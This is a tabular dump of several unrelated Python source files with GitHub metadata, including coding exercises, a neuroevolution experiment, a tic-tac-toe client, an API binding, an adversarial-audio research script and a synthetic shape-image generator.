blob_id (string, length 40) | directory_id (string, length 40) | path (string, length 2–616) | content_id (string, length 40) | detected_licenses (list, 0–69 items) | license_type (string, 2 classes) | repo_name (string, length 5–118) | snapshot_id (string, length 40) | revision_id (string, length 40) | branch_name (string, length 4–63) | visit_date (timestamp[us]) | revision_date (timestamp[us]) | committer_date (timestamp[us]) | github_id (int64, 2.91k–686M, nullable) | star_events_count (int64, 0–209k) | fork_events_count (int64, 0–110k) | gha_license_id (string, 23 classes) | gha_event_created_at (timestamp[us]) | gha_created_at (timestamp[us]) | gha_language (string, 213 classes) | src_encoding (string, 30 classes) | language (string, 1 class) | is_vendor (bool, 2 classes) | is_generated (bool, 2 classes) | length_bytes (int64, 2–10.3M) | extension (string, 246 classes) | content (string, length 2–10.3M) | authors (list, 1 item) | author_id (string, length 0–212) |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
93ccfb613e8a6d37f9533d4e82cc851a21b51f19
|
454447e212ed11c4626268c868f21d69e8beb1d3
|
/Problems/Order!/main.py
|
05c7ff33d459cac6b2bb0c5337dc165563b02b1c
|
[] |
no_license
|
hereskellie/Zookeeper_Python3
|
24930cda82bc43511acd3339c5cdcaa0024e9094
|
1af83866c3a4dd6a88ffcdd687d4446ea8e3f7d3
|
refs/heads/master
| 2022-12-25T13:06:49.337643
| 2020-10-04T20:43:53
| 2020-10-04T20:43:53
| 301,220,274
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 198
|
py
|
num1 = int(input())
num2 = int(input())
num3 = int(input())
result = num1 < num2 < num3
print(result)
# Take an upper limit as input, start a counter at 2, and while the counter
# is below that limit, print it and increase it by 2.
limit = int(input())
variable = 2
while variable < limit:
    print(variable)
    variable += 2
|
[
"kelliemjhughes@gmail.com"
] |
kelliemjhughes@gmail.com
|
463f130c700d4c1a9dd6fa39dc7428e19dcfa404
|
2d1367bab56b5fdfb48a9fba03c2595557777652
|
/python/miscellaneous/fixed_point_determiner.py
|
7a2e6d4911c27d50f306c9dccfb84eb07bbb0e2d
|
[] |
no_license
|
baraluga/programming_sandbox
|
11e1855d0c6df00f8a1dc929d1f4a72b2f24f161
|
9113b0ca1a57faa2918509fb935650c97d279c37
|
refs/heads/master
| 2021-07-17T22:48:59.182600
| 2020-05-12T08:05:48
| 2020-05-12T08:05:48
| 150,398,616
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 577
|
py
|
def get_fixed_point(from_this):
fixed_point = [fix for idx, fix in enumerate(from_this) if idx == fix]
return fixed_point[0] if fixed_point else False
if __name__ == "__main__":
'''
A fixed point in an array is an element whose value is equal to its index.
Given a sorted array of distinct elements, return a fixed point,
if one exists. Otherwise, return False.
For example, given [-6, 0, 2, 40], you should return 2.
Given [1, 5, 7, 8], you should return False.
'''
TEST_INPUT = [-6, 0, 2, 40]
print(get_fixed_point(TEST_INPUT))
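# Sketch of an alternative, not part of the original solution (the helper name
# get_fixed_point_binary is illustrative): since the array is sorted and its elements
# are distinct, a fixed point can also be found in O(log n) with a binary search on
# the sign of value - index.
def get_fixed_point_binary(from_this):
    lo, hi = 0, len(from_this) - 1
    while lo <= hi:
        mid = (lo + hi) // 2
        if from_this[mid] == mid:
            return from_this[mid]
        if from_this[mid] < mid:
            lo = mid + 1
        else:
            hi = mid - 1
    return False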
|
[
"brian.peralta@tractebel.engie.com"
] |
brian.peralta@tractebel.engie.com
|
c0b3207f5177a907989a02827a6d45637df8f29d
|
1ced884d3844a0c237dd5201bcf64f939b845f76
|
/agent_zoo/ExperimentB.py
|
23e8f09b47314f5c44216c87c1ef95ac0dcbde1a
|
[
"MIT"
] |
permissive
|
bakerb15/roboschool
|
c7bae73e1f5639ccd10bd4961322bb433f6177e4
|
47262b5d572e60fe832a81cbd7ed4eab3667373c
|
refs/heads/master
| 2020-04-02T06:32:00.957618
| 2018-12-09T07:34:26
| 2018-12-09T07:34:26
| 154,154,816
| 1
| 0
|
NOASSERTION
| 2018-10-22T14:05:34
| 2018-10-22T14:05:33
| null |
UTF-8
|
Python
| false
| false
| 6,200
|
py
|
import sys
import random
import time
import copy
import numpy as np
from collections import OrderedDict
from agent_zoo.weight_writer import weight_writer
from agent_zoo.Eval import Eval
NAME = 'B5'
HIGH = 1.5
LOW = .5
SEED = 12
MAX_GEN = 100
MAX_POPULATION = 20
CLONE_RATE = .1
CLONES = int(.05 * MAX_POPULATION)
MAX_FRAME = 200 # how many frames the robot is simulated for
# #B3
# HIGH = 5
# LOW = -5
# SEED = 12
# MAX_GEN = 1000
# MAX_POPULATION = 30
# CLONE_RATE = .05
# CLONES = int(.5 * MAX_POPULATION)
# MAX_FRAME = 50 # how many frames the robot is simulated for
class Individual(object):
def __init__(self, svd_dic, genotype=None):
self.svd_dic = svd_dic #a reference to all the precomputed SVDs
if genotype is None:
self.genotype = [ random.uniform(LOW, HIGH) for i in range(len(svd_dic))]
else:
self.genotype = genotype
self.fitness = None
def get_weights(self):
weights = {}
i = 0
for layer in self.svd_dic:
if self.svd_dic[layer][0] is True:
U, s, V = copy.deepcopy(self.svd_dic[layer][1])
s *= self.genotype[i]
weights[layer] = np.matmul( U ,np.matmul(np.diag(s), V))
else: # a bias layer so matrix multiplication is not necessary
weights[layer] = self.genotype[i] * copy.deepcopy(self.svd_dic[layer][1])
i += 1
return weights
def mate(self, partner):
gt = []
for i in range(len(self.genotype)):
if random.randint(0,99) % 2 == 0:
gt.append(self.genotype[i])
else:
gt.append(partner.genotype[i])
return Individual(self.svd_dic, genotype=gt)
# returns a list of individuals that have been selected
def select_parents(population, selection_rate):
total_fitness = 0
for indiv in population:
if indiv.fitness is not None:
total_fitness += indiv.fitness
selected = []
# create a random list of indices
order = [i for i in range(len(population))]
random.shuffle(order)
how_many = int(selection_rate * len(population))
index = 0
while len(selected) < how_many:
indiv = population[order[index]]
if (indiv.fitness / total_fitness) > random.random():
selected.append(indiv)
index += 1
if index > (len(population) -1):
index = 0
return selected
def mutate(individual):
index = random.randint(0, len(individual.genotype) -1)
# individual.genotype[index] = random.uniform(LOW, HIGH) * individual.genotype[index]
individual.genotype[index] = random.uniform(LOW, HIGH)
def clone(individuals):
clones = []
for indiv in individuals:
for i in range(CLONES):
clones.append(Individual(indiv.svd_dic, copy.deepcopy(indiv.genotype)))
return clones
def main():
start_time = time.process_time()
random.seed(SEED)
weightfile = 'RoboschoolAnt_v1_2017jul.weights'
original = {}
exec(open(weightfile).read(), original)
layerNames = ['weights_dense1_w', 'weights_dense1_b', 'weights_dense2_w', 'weights_dense2_b', 'weights_final_w',
'weights_final_b']
svd_dict = OrderedDict()
for layer in layerNames:
if len(original[layer].shape) == 2:
U, s, V = np.linalg.svd( original[layer], full_matrices=False)
svd_dict[layer] = True, (U, s, V)
else:
svd_dict[layer] = False, original[layer]
#generate initial population
population = [Individual(svd_dict) for i in range(MAX_POPULATION)]
print('Starting evolution')
# base_indiv_fitness = evaluate_individual(original)
with open('Experiment{}_results.csv'.format(NAME), 'w') as writer_results:
with open('logEvalb.csv', 'w') as logger:
logger.write('time\n')
header = 'generation, run_time, avg_fitness, top_fitness'
print(header)
writer_results.write(header + '\n')
for generation in range(MAX_GEN):
start = time.process_time()
for indiv in population:
if indiv.fitness is None:
indiv.fitness = Eval().evaluate_individual(MAX_FRAME, indiv.get_weights(), logger)
#select individuals for reproduction
selected = select_parents(population, CLONE_RATE)
#generate children
children = clone(selected)
for child in children:
mutate(child)
#evaluate children
for child in children:
if child.fitness is None:
child.fitness = Eval().evaluate_individual(MAX_FRAME, child.get_weights(), logger)
population.extend(children)
population = sorted(population, key=lambda x: x.fitness, reverse=True)
survivors_indices = [random.randint(3, len(population) -1) for i in range(MAX_POPULATION -1)]
survivors = []
survivors.append(population[0])
survivors.append(population[1])
survivors.append(population[2])
for index in survivors_indices:
survivors.append(population[index])
population = survivors
total_fitness = 0
for indiv in population:
total_fitness += indiv.fitness
avg_fitness = total_fitness/len(population)
run_time = time.process_time() - start
result = '{}, {}, {}, {}'.format(generation, run_time, avg_fitness, population[0].fitness)
print(result)
writer_results.write(result +'\n')
for indiv in population:
indiv.fitness = None
with open('Elite_Individual_Experiment{}.weights'.format(NAME), 'w') as wrt:
weight_writer(wrt, population[0].get_weights())
total_time = time.process_time() - start_time
print('RunTime: {}'.format(str(total_time)))
if __name__ == '__main__':
main()
|
[
"bakerb15@msu.edu"
] |
bakerb15@msu.edu
|
e6266e5cb1980afe195a340cc3ee2136a87072b8
|
074200406165bdcb62132e14c62306d7abcf14ed
|
/080-RemoveDuplicatesFromSortedArrayII/Python/main.py
|
7b40ba8d25c7d0ae73da3e0f55fdf74f3a6637af
|
[] |
no_license
|
Twice22/Leetcode
|
220a6555141b6e5cee283e601a5740a74daf97a9
|
b2e80268a8e7a37b2db09f1103e91db0b4bf424e
|
refs/heads/master
| 2020-03-18T01:48:35.456957
| 2018-12-28T16:31:25
| 2018-12-28T16:31:25
| 134,160,724
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,293
|
py
|
class Solution:
def removeDuplicates(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
# need to modify inplace with O(1) extra memory
# so we CANNOT use a dict and 2 passes
if not nums:
return 0
ptr_insert, i, size = -1, 0, len(nums)
while i < size:
if ptr_insert != -1 and i != ptr_insert and ((i+1 < size and nums[i+1] != nums[i]) or i+1 >= size):
nums[ptr_insert] = nums[i]
ptr_insert += 1
c = 1
while i + 1 < size and nums[i+1] == nums[i]:
c += 1
i += 1
if ptr_insert != -1 and i != ptr_insert and c <= 3:
nums[ptr_insert] = nums[i]
ptr_insert += 1
if ptr_insert == -1 and c == 3:
ptr_insert = i
# don't forget to add the last
# "2 <=" proves we came from the while loop
if ptr_insert != -1 and 2 <= c < 3:
nums[ptr_insert] = nums[i-1]
ptr_insert += 1
# point on different next number
i += 1
return i if ptr_insert == -1 else ptr_insert
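# Illustrative check (a sketch; the values come from the LeetCode problem's own example,
# and the expected result reflects the problem statement, not a verified run of this code):
#   nums = [1, 1, 1, 2, 2, 3]
#   k = Solution().removeDuplicates(nums)
#   expected: k == 5 and nums[:k] == [1, 1, 2, 2, 3]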
|
[
"victor.busa@gmail.com"
] |
victor.busa@gmail.com
|
e77154fd8017abc681c941a9717e4b66d8284137
|
2335f5b0921030aeb7162dacb044155395a2e98e
|
/conf-cumulativelogprobs/evasion_pgd.py
|
baca3bd5973812fbfa95fc9771441bd123e0a2e0
|
[] |
no_license
|
dijksterhuis/cleverspeech-exp
|
d66a1f9759b50d7bb846a8e32a0a2470989f668d
|
779db8eddb8e5c34888a103c10ad2e1b23eea657
|
refs/heads/master
| 2023-07-09T09:25:32.378259
| 2021-08-09T17:57:37
| 2021-08-09T17:57:37
| 329,070,650
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,035
|
py
|
#!/usr/bin/env python3
import os
from cleverspeech import data
from cleverspeech import graph
from cleverspeech.utils.Utils import log
from cleverspeech.utils.runtime.Execution import manager
from cleverspeech.utils.runtime.ExperimentArguments import args
# victim model import
from SecEval import VictimAPI as DeepSpeech
# local attack classes
import custom_defs
LOSS_CHOICES = {
"fwd": custom_defs.FwdOnlyLogProbsLoss,
"back": custom_defs.BackOnlyLogProbsLoss,
"fwdplusback": custom_defs.FwdPlusBackLogProbsLoss,
"fwdmultback": custom_defs.FwdMultBackLogProbsLoss,
}
def create_attack_graph(sess, batch, settings):
attack = graph.AttackConstructors.EvasionAttackConstructor(
sess, batch
)
attack.add_path_search(
graph.Paths.ALL_PATHS[settings["align"]]
)
attack.add_placeholders(
graph.Placeholders.Placeholders
)
attack.add_hard_constraint(
graph.Constraints.L2,
r_constant=settings["rescale"],
update_method=settings["constraint_update"],
)
attack.add_perturbation_subgraph(
graph.PerturbationSubGraphs.Independent
)
attack.add_victim(
DeepSpeech.Model,
decoder=settings["decoder"],
beam_width=settings["beam_width"]
)
attack.add_loss(
LOSS_CHOICES[settings["loss"]],
)
attack.add_optimiser(
graph.Optimisers.AdamIndependentOptimiser,
learning_rate=settings["learning_rate"]
)
attack.add_procedure(
graph.Procedures.EvasionCGD,
steps=settings["nsteps"],
update_step=settings["decode_step"]
)
return attack
def custom_extract_results(attack):
results = data.egress.extract.get_attack_state(attack)
target_alpha = attack.loss[0].fwd_target_log_probs
target_beta = attack.loss[0].back_target_log_probs
alpha, beta = attack.procedure.tf_run(
[target_alpha, target_beta]
)
results.update(
{
"alpha": alpha,
"beta": beta,
}
)
return results
def attack_run(master_settings):
align = master_settings["align"]
decoder = master_settings["decoder"]
loss = master_settings["loss"]
outdir = master_settings["outdir"]
attack_type = os.path.basename(__file__).replace(".py", "")
outdir = os.path.join(outdir, attack_type)
outdir = os.path.join(outdir, "confidence/cumulative_logprobs/")
outdir = os.path.join(outdir, "{}/".format(align))
outdir = os.path.join(outdir, "{}/".format(decoder))
outdir = os.path.join(outdir, "{}/".format(loss))
master_settings["outdir"] = outdir
batch_gen = data.ingress.mcv_v1.BatchIterator(master_settings)
manager(
master_settings,
create_attack_graph,
batch_gen,
results_extract_fn=custom_extract_results,
)
log("Finished run.")
if __name__ == '__main__':
extra_args = {
"loss": [str, "fwd", False, LOSS_CHOICES.keys()],
}
args(attack_run, additional_args=extra_args)
|
[
"mrobeson@dundee.ac.uk"
] |
mrobeson@dundee.ac.uk
|
1415423a548d19a490a2a7d777b5a8c84c6ad27d
|
fb7c1b112a92047145ded2e4c90ed93e119ea423
|
/03.py
|
51f2812b6ed3358b9c8dd621fccfa05bbb090a50
|
[] |
no_license
|
CosmoAndrade/PythonExercicios2020
|
54d5285ca7f502f3d4186be583f506b75e8c4ff3
|
005bfae05473d7d22d929e9e7c1888abab514414
|
refs/heads/master
| 2022-11-26T02:56:55.165405
| 2020-08-05T23:40:01
| 2020-08-05T23:40:01
| 284,506,395
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 213
|
py
|
# Write a program that asks for two numbers and prints their sum.
num1 = int(input('Digite um numero: '))
num2 = int(input('Digite outro numero: '))
soma = num1 + num2
print(f'A soma entre {num1} e {num2} é {soma}')
|
[
"cosmo.andrade@hotmail.com"
] |
cosmo.andrade@hotmail.com
|
007ead1dabd05f60c72f61f2b58d80407cf8faea
|
9357b4824629465438353f726ffa08d1c54424d7
|
/hello.py
|
fb7d9ce7e93eea866fc8a7541c65f05addd33f71
|
[] |
no_license
|
Rumdidum/google-course
|
c0b9e51021d4a2e81c4c31fed7df765b5429c602
|
5f0cfe1dcb1b0d20f8e9278d73969aa6060f7105
|
refs/heads/main
| 2023-08-28T15:53:37.752280
| 2021-11-07T14:42:14
| 2021-11-07T14:42:14
| 425,485,613
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 45
|
py
|
print("was ein dreck")
print("what the hell")
|
[
"waldemar.rink2021@gmail.com"
] |
waldemar.rink2021@gmail.com
|
5cecd4d9e60b44e4ca8d422a0f059209d7ee993c
|
9c88ee174f74a5a8352ec8cf487a302aa87053d0
|
/pylark/api_service_helpdesk_agent_skill_update.py
|
dc104e38fcbf0b2ca93b5a1d0fda43225110d229
|
[
"Apache-2.0"
] |
permissive
|
duzx1/pylark
|
bcf34231218ec5079b8f9820a77864fbcffa4426
|
a54cce6b814935fd3c72668b262b54c8ee461484
|
refs/heads/master
| 2023-08-23T13:10:00.324018
| 2021-11-01T06:29:28
| 2021-11-01T06:29:28
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,422
|
py
|
# Code generated by lark_sdk_gen. DO NOT EDIT.
from pylark.lark_request import RawRequestReq, _new_method_option
from pylark import lark_type, lark_type_sheet, lark_type_approval
import attr
import typing
import io
@attr.s
class UpdateHelpdeskAgentSkillReqAgentSkillRules(object):
id: str = attr.ib(
default="", metadata={"req_type": "json", "key": "id"}
) # rule id; see [list agent skill rules](https://open.feishu.cn/document/ukTMukTMukTM/ucDOyYjL3gjM24yN4IjN/list-agent-skill-rules) for the available rule options, example value: "test-skill-id"
selected_operator: int = attr.ib(
default=0, metadata={"req_type": "json", "key": "selected_operator"}
) # comparison operator; see [agent skill operator options](https://open.feishu.cn/document/ukTMukTMukTM/ucDOyYjL3gjM24yN4IjN/operator-options), example value: 3
operator_options: typing.List[int] = attr.ib(
factory=lambda: [], metadata={"req_type": "json", "key": "operator_options"}
) # rule operand values; see [agent skills and operators](https://open.feishu.cn/document/ukTMukTMukTM/ucDOyYjL3gjM24yN4IjN/operator-options)
operand: str = attr.ib(
default="", metadata={"req_type": "json", "key": "operand"}
) # rule operand value, example value: " {, "selected": ["6883005079188668418"],, "options": [, {, "id": "6883005079188668418",, "name": {, "en_us": "小程序及应用",, "ja_jp": "小程序及应用",, "zh_cn": "小程序及应用", }, },, {, "children": [, {, "id": "6883005086914625538",, "name": {, "en_us": "消息提醒",, "ja_jp": "消息提醒",, "zh_cn": "消息提醒", }, },, {, "id": "6883005092723802114",, "name": {, "en_us": "其他",, "ja_jp": "其他",, "zh_cn": "其他", }, }, ],, "id": "6883005085605986306",, "name": {, "en_us": "聊天和群组",, "ja_jp": "聊天和群组",, "zh_cn": "聊天和群组", }, },, ],, }"
@attr.s
class UpdateHelpdeskAgentSkillReqAgentSkill(object):
name: str = attr.ib(
default="", metadata={"req_type": "json", "key": "name"}
) # skill name, example value: "skill-name"
rules: UpdateHelpdeskAgentSkillReqAgentSkillRules = attr.ib(
default=None, metadata={"req_type": "json", "key": "rules"}
) # skill rules
agent_ids: typing.List[str] = attr.ib(
factory=lambda: [], metadata={"req_type": "json", "key": "agent_ids"}
) # ids of the agents who have this skill
@attr.s
class UpdateHelpdeskAgentSkillReq(object):
agent_skill_id: str = attr.ib(
default="", metadata={"req_type": "path", "key": "agent_skill_id"}
) # agent skill id, example value: "test-skill-id"
agent_skill: UpdateHelpdeskAgentSkillReqAgentSkill = attr.ib(
default=None, metadata={"req_type": "json", "key": "agent_skill"}
) # the agent skill to update
@attr.s
class UpdateHelpdeskAgentSkillResp(object):
pass
def _gen_update_helpdesk_agent_skill_req(request, options) -> RawRequestReq:
return RawRequestReq(
dataclass=UpdateHelpdeskAgentSkillResp,
scope="Helpdesk",
api="UpdateHelpdeskAgentSkill",
method="PATCH",
url="https://open.feishu.cn/open-apis/helpdesk/v1/agent_skills/:agent_skill_id",
body=request,
method_option=_new_method_option(options),
need_user_access_token=True,
need_helpdesk_auth=True,
)
|
[
"chyroc@qq.com"
] |
chyroc@qq.com
|
6b85f42196e17ff4126d054a820bf3b7a4e41bc1
|
d8fc7c283c3a9d82d1beed34aebaf63c9aae809e
|
/app/web/__init__.py
|
c22e0f946653879d8ae731cb76cd2332c6931589
|
[] |
no_license
|
cardinalion/learnflask
|
dc2cea4e3eda864b4f69e7cda8f324afaf68c9ef
|
8224361478357bbb58e6ee8bcf38183910dd82a1
|
refs/heads/master
| 2020-04-17T17:12:21.963928
| 2019-01-24T04:42:58
| 2019-01-24T04:42:58
| 166,773,298
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 46
|
py
|
"""
1/23/2019
"""
__author__ = 'cardinalion'
|
[
"ywang10@wesleyan.edu"
] |
ywang10@wesleyan.edu
|
53b2ae48b341c3264c6e26ff968ef5a96651cdac
|
c86693fe6e877a7fabd4cbbaf42c35e1c3f7981a
|
/client/Commands.py
|
39ab8591d846cc5bea06ec647a7c54dc3246689d
|
[] |
no_license
|
NormanLe/Tic-Tac-Toe-Server
|
0e546998a9ca51db594143248ac3c4bdceadc0df
|
86dec773e5770034b4c1f802ad2b19c22868271b
|
refs/heads/master
| 2021-01-20T15:26:17.959532
| 2017-06-14T02:17:27
| 2017-06-14T02:17:27
| 90,766,167
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,388
|
py
|
''' Functions to support commands input by user.
'''
import sys
import MessageHandler
from const import *
def help():
''' This command takes no arguments. It prints the list of supported commands (the ones
shown below). For each command, it prints a brief description of what the command does
and the syntax for using it.
'''
print("Supported commands:")
print("help : Print a list of supported commands")
print(
"login [name] [mode]: Login to the game server. Takes 2 arguments, [name] and [mode], A for automatch, M for automatch off")
print("place [n] : Issues a move. Takes one argument [n], which is between 1 and 9 inclusive")
print("exit : Exit the server")
print("who : List all players logged in")
print("games : List all ongoing games")
print("play [name] : Request to play a user. Takes one argument, [name] of player to request\n")
def login(s, state, name, mode):
''' This command takes two arguments: your name and a mode ('A' for automatch, 'M' for
automatch off). A player name is a userid that uniquely identifies a player. The name and
mode are sent to the server, and the server's response determines whether login succeeded.'''
if mode is None:
mode = 'A'
if mode and mode not in ['A', 'M']:
print("Mode must be A or M\n")
return
# Send message to server
s.send(LOGIN(name, mode))
# Receive response message from server
s.recv_messages()
# Check response from server
response = s.read_message()
while response:
if response in [OK, ERR401]:
MessageHandler.handle_login(s, state, response, name, mode)
return
else:
MessageHandler.handle_unrecognized(s, state, response)
response = s.read_message()
def place(s, state, n):
'''This command issues a move. It takes one argument n, which is between 1 and 9 inclusive.
It identifies the cell that the player chooses to occupy on this move.
If all is well, the new game state is received from the server and displayed.'''
try:
n = int(n)
except ValueError:
print("place must be called with an integer argument\n")
return
# Send place message to server
s.send(PLACE(n))
def exit(s, state):
''' This command allows player to exit '''
# Check if player logged in:
# if not state.logged_in:
# print("You are not logged in.\n")
# return
# Send exit message to server
s.send(EXIT)
print("Exiting ... \n")
sys.exit()
# Note: Remaining code won't execute/matter,
# Since server will close connection immediately.
# Update state
state.initiated_exit = True
state.clear_game()
s.recv_messages()
response = s.read_message()
# Exit can be received from main
while response:
if response in [OK, QUIT]:
MessageHandler.handle_quit(s, state, response)
response = s.read_message()
def games(s):
s.send(GAMES)
# nothing else needs to be done, just wait for response
def who(s):
s.send(WHO)
# nothing else needs to be done, just wait for response
def play(s, name):
s.send(PLAY(name))
# nothing else needs to be done, just wait for found/error
def observe(s, name):
s.send(OBSERVE(name))
def unobserve(s, name):
s.send(UNOBSERVE(name))
def message(s, message):
s.send(message)
|
[
"norman.le@stonybrook.edu"
] |
norman.le@stonybrook.edu
|
017688ce2eb9785ec864f48899013443afcaf24e
|
70b65dfeafb3821ea09e55e846915bd57d4a10ff
|
/data.py
|
682e7f1d8bd22c2d5fb568f03423e8590e5064a1
|
[] |
no_license
|
maxeonyx/comp421-project
|
21a05eabf15eac46be386ee7effd6c6865236d7b
|
73700f0744fda37c75d6e90740a8544c152eb62c
|
refs/heads/master
| 2023-01-05T01:17:45.830898
| 2020-10-23T10:57:39
| 2020-10-23T10:57:39
| 304,153,062
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 14,597
|
py
|
import numpy as np
import tensorflow as tf
from PIL import Image, ImageDraw
import itertools
from IPython.display import display
shape_types = [
"line",
"square",
"circle",
"tri",
]
line_types = [
"single",
"double",
"filled",
]
colors = [
"white",
"blue",
"green",
"red",
"rainbow",
]
dont_include = [
("line", "filled", "green"),
("square", "filled", "green"),
("circle", "filled", "green"),
("line", "filled", "green"),
("square", "filled", "green"),
("circle", "filled", "green"),
]
def all_classes():
return itertools.product(shape_types, line_types, colors)
def rainbow(shape, center_x, center_y, angle):
rx = np.linspace(-1, 1, shape[0])
ry = np.linspace(-1, 1, shape[1])
coords = np.stack(np.meshgrid(rx, ry), axis=-1)
angles = np.arctan2(coords[:, :, 0] - center_x, coords[:, :, 1] - center_y) + angle
magnitudes = np.linalg.norm(coords, axis=-1)
h = angles / (2*np.pi) + 0.5
s = np.clip(magnitudes*2, 0, 1)
v = np.ones_like(angles)
hsv = np.stack([h, s, v], axis=-1)
hsv = (hsv * 255).astype(np.uint8)
i = Image.fromarray(hsv, mode="HSV")
i = i.convert(mode="RGB")
rgb = np.asarray(i).astype(np.float) / 255.0
return rgb
def new_line(d, center_x, center_y, radius, angle, fill, line_width):
point1x = center_x + radius * np.cos(angle)
point1y = center_y + radius * np.sin(angle)
point2x = center_x + radius * np.cos(angle+np.pi)
point2y = center_y + radius * np.sin(angle+np.pi)
d.line([(point1x, point1y), (point2x,point2y)], fill=fill, width=int(line_width))
def square(d, center_x, center_y, radius, angle, fill):
point1x = center_x + radius * np.cos(angle)
point1y = center_y + radius * np.sin(angle)
point2x = center_x + radius * np.cos(angle+np.pi/2)
point2y = center_y + radius * np.sin(angle+np.pi/2)
point3x = center_x + radius * np.cos(angle+np.pi)
point3y = center_y + radius * np.sin(angle+np.pi)
point4x = center_x + radius * np.cos(angle-np.pi/2)
point4y = center_y + radius * np.sin(angle-np.pi/2)
d.polygon([(point1x, point1y), (point2x,point2y), (point3x,point3y), (point4x,point4y)], fill=fill)
def tri(d, center_x, center_y, radius, angle, fill):
point1x = center_x + radius * np.cos(angle)
point1y = center_y + radius * np.sin(angle)
point2x = center_x + radius * np.cos(angle+2*np.pi/3)
point2y = center_y + radius * np.sin(angle+2*np.pi/3)
point3x = center_x + radius * np.cos(angle-2*np.pi/3)
point3y = center_y + radius * np.sin(angle-2*np.pi/3)
d.polygon([(point1x, point1y), (point2x,point2y), (point3x,point3y)], fill=fill)
def circle(d, center_x, center_y, radius, angle, fill):
d.ellipse([(center_x - radius, center_y - radius), (center_x + radius, center_y + radius)], fill=fill)
# assumes 3 channels
def shapes(params, draw_size, resize_to, min_radius, max_radius, line_width):
n_images = len(params)
image_width = draw_size
image_height = draw_size
# images = np.zeros((len(params), resize_to, resize_to, 3), dtype=np.float)
images = np.random.random([len(params), resize_to, resize_to, 3])
# background = np.random.random([len(params), resize_to, resize_to, 3])
background = np.zeros([len(params), resize_to, resize_to, 3])
white = (255, 255, 255)
red = (255, 0, 0)
green = (0, 255, 0)
blue = (0, 0, 255)
black = (0, 0, 0)
rbow = rainbow(images[0].shape, 0, 0, 0)
for i in range(n_images):
shape, line_type, color = params[i]
radius = np.random.uniform(min_radius, max_radius)
angle = np.random.uniform(-np.pi, np.pi)
# leave 2 pixels at the edge
center_x = np.random.uniform(0+radius+2, image_width-radius-2)
center_y = np.random.uniform(0+radius+2, image_height-radius-2)
angle = np.random.uniform(-np.pi, np.pi)
# img = Image.fromarray(noiseimages[i], "RGB")
img = Image.new("RGB", (draw_size, draw_size))
d = ImageDraw.Draw(img)
fill = white
if shape == "line":
if line_type == "single":
new_line(d, center_x, center_y, radius, angle, fill, line_width)
elif line_type == "filled":
new_line(d, center_x, center_y, radius, angle, fill, line_width * 4)
elif line_type == "double":
center_offset_x = line_width * np.cos(angle + np.pi/2)
center_offset_y = line_width * np.sin(angle + np.pi/2)
new_line(d, center_x + center_offset_x, center_y + center_offset_y, radius, angle, fill, line_width)
new_line(d, center_x - center_offset_x, center_y - center_offset_y, radius, angle, fill, line_width)
pass
if shape == "tri":
tri_line_width = line_width * 2
tri(d, center_x, center_y, radius, angle, fill)
if line_type != "filled":
tri(d, center_x, center_y, radius-tri_line_width, angle, black)
if line_type == "double":
tri(d, center_x, center_y, radius-tri_line_width*2-1, angle, fill)
tri(d, center_x, center_y, radius-tri_line_width*3-1, angle, black)
elif shape == "square":
sq_line_width = line_width * 1.41
square(d, center_x, center_y, radius, angle, fill)
if line_type != "filled":
square(d, center_x, center_y, radius-sq_line_width, angle, black)
if line_type == "double":
square(d, center_x, center_y, radius-sq_line_width*2-1, angle, fill)
square(d, center_x, center_y, radius-sq_line_width*3-1, angle, black)
elif shape == "circle":
circle(d, center_x, center_y, radius, angle, fill)
if line_type != "filled":
circle(d, center_x, center_y, radius-line_width, angle, black)
if line_type == "double":
circle(d, center_x, center_y, radius-line_width*2-1, angle, fill)
circle(d, center_x, center_y, radius-line_width*3-1, angle, black)
img = img.resize((resize_to, resize_to))
mask = np.asarray(img).astype(np.float) / 255.0
if color == "rainbow":
images[i] = rbow * mask + background[i] * (1 - mask)
elif color == "red":
images[i] = np.array([1, 0, 0]) * mask + background[i] * (1 - mask)
elif color == "green":
images[i] = np.array([0, 1, 0]) * mask + background[i] * (1 - mask)
elif color == "blue":
images[i] = np.array([0, 0, 1]) * mask + background[i] * (1 - mask)
elif color == "white":
images[i] = mask + background[i] * (1 - mask)
return images
def example_shapes():
par = list(all_classes())
draw_size = 200
resize_to = 48
line_width = draw_size / 25
min_radius = line_width * 6
max_radius = min_radius * 1.5
images = shapes(par, draw_size, resize_to, min_radius=min_radius, max_radius=max_radius, line_width=line_width)
return images
def line(images, min_length=48, max_length=48):
n_images = images.shape[0]
image_width = images.shape[1]
image_height = images.shape[2]
lengths = np.random.uniform(min_length, max_length, n_images)
angles = np.random.uniform(-np.pi, np.pi, n_images)
widths = lengths * np.cos(angles)
heights = lengths * np.sin(angles)
x_lows = np.clip(-widths+1, 1, image_width-1)
x_highs = np.clip(image_width-widths-1, 1, image_width-1)
y_lows = np.clip(-heights+1, 1, image_height-1)
y_highs = np.clip(image_height-heights-1, 1, image_height-1)
starts = np.random.uniform(np.stack([x_lows, y_lows], axis=1), np.stack([x_highs, y_highs], axis=1), [n_images, 2])
ends = starts + np.stack([widths, heights], axis=1)
starts = starts.astype(np.uint32)
ends = ends.astype(np.uint32)
for i in range(n_images):
imgdata = images[i]
img = Image.frombuffer("L", imgdata.shape, imgdata)
img.readonly = False
d = ImageDraw.Draw(img)
d.line([tuple(starts[i]), tuple(ends[i])], fill=255, width=6)
def rect(images, min_size=16, max_size=48):
n_images = images.shape[0]
image_width = images.shape[1]
image_height = images.shape[2]
widths = np.random.uniform(min_size, max_size, n_images)
heights = np.random.uniform(min_size, max_size, n_images)
x_lows = np.clip(-widths+1, 1, image_width-1)
x_highs = np.clip(image_width-widths-1, 1, image_width-1)
y_lows = np.clip(-heights+1, 1, image_height-1)
y_highs = np.clip(image_height-heights-1, 1, image_height-1)
